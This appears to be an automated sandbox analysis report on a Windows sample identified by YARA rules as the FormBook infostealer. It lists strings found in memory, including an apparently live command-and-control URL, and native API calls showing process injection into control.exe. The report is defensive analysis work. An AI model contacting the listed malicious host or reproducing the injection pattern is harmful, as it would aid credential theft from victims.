          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: control.exe, 00000007.00000002.917583197.0000000005212000.00000004.00000001.sdmpString found in binary or memory: https://www.cleanxcare.com/p2io/?CFQHg=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.916418172.0000000000DA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.656408527.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.916447629.0000000000DD0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.729969001.00000000017E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.0.lTAPQJikGw.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.lTAPQJikGw.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.lTAPQJikGw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.lTAPQJikGw.exe.4349930.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.lTAPQJikGw.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.916418172.0000000000DA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.916418172.0000000000DA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.656408527.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.656408527.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.916447629.0000000000DD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.916447629.0000000000DD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.729969001.00000000017E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.729969001.00000000017E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.lTAPQJikGw.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.lTAPQJikGw.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.lTAPQJikGw.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.lTAPQJikGw.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.lTAPQJikGw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.lTAPQJikGw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.lTAPQJikGw.exe.4349930.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.lTAPQJikGw.exe.4349930.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.lTAPQJikGw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.lTAPQJikGw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_004182E0 NtClose,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_004182AC NtReadFile,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041838B NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015199A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015198F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015195D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015197A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015196E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015199D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0151B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015198A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0151A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519A10 NtQuerySection,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519560 NtWriteFile,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0151AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015195F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0151A770 NtOpenThread,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519760 NtOpenProcess,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0151A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015196D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BCB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BCAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BCA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BCA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BCA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_009481B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_009482E0 NtClose,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00948260 NtReadFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00948390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_009482AC NtReadFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094838B NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 0_2_00ECB7D5
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 0_2_01870D80
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 0_2_01B3B264
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 0_2_01B3DF50
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 0_2_01B3C2B0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 0_2_01B39990
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 0_2_0581D0C0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 0_2_05812160
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 0_2_05812170
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 0_2_0581D0B0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 0_2_058123B1
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 0_2_058123C0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 0_2_00ECC915
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00401030
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041B8B1
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041B963
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00408C4B
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00408C50
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041B493
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041B496
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041C539
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00402D89
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00402D90
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041CE85
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041BF12
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041C795
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00402FB0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00A5B7D5
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DF900
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014F4120
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591002
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015AE824
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A28EC
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014EB090
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015020A0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A20A8
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FAB40
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A2B28
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015903DA
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159DBD2
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150EBB0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0158FA2B
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A22AE
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A1D55
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A2D07
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D0D20
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A25DD
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014ED5E0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01502581
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159D466
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E841F
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015ADFCE
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A1FF1
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159D616
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014F6E30
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A2EF7
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00A5C915
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB20A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B9B090
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C520A8
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B9841F
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C41002
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB2581
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B9D5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C51D55
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B80D20
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BA4120
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B8F900
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C52D07
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C52EF7
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C522AE
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BA6E30
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BBEBB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C51FF1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C52B28
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094B8B1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094B954
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094B496
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094B493
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00938C50
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00938C4B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00932D90
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00932D89
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094C539
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094CE85
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094C795
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00932FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094BF12
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04B8B150 appears 35 times
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: String function: 014DB150 appears 48 times
          Source: lTAPQJikGw.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: lTAPQJikGw.exeBinary or memory string: OriginalFilename vs lTAPQJikGw.exe
          Source: lTAPQJikGw.exe, 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKygo.dll* vs lTAPQJikGw.exe
          Source: lTAPQJikGw.exe, 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs lTAPQJikGw.exe
          Source: lTAPQJikGw.exe, 00000000.00000002.656995303.0000000000EC2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCryptoConfig.exeH vs lTAPQJikGw.exe
          Source: lTAPQJikGw.exeBinary or memory string: OriginalFilename vs lTAPQJikGw.exe
          Source: lTAPQJikGw.exe, 00000002.00000000.656432676.0000000000A52000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCryptoConfig.exeH vs lTAPQJikGw.exe
          Source: lTAPQJikGw.exe, 00000002.00000002.729531949.00000000015CF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs lTAPQJikGw.exe
          Source: lTAPQJikGw.exe, 00000002.00000002.730181194.0000000001975000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs lTAPQJikGw.exe
          Source: lTAPQJikGw.exeBinary or memory string: OriginalFilenameCryptoConfig.exeH vs lTAPQJikGw.exe
          Source: lTAPQJikGw.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
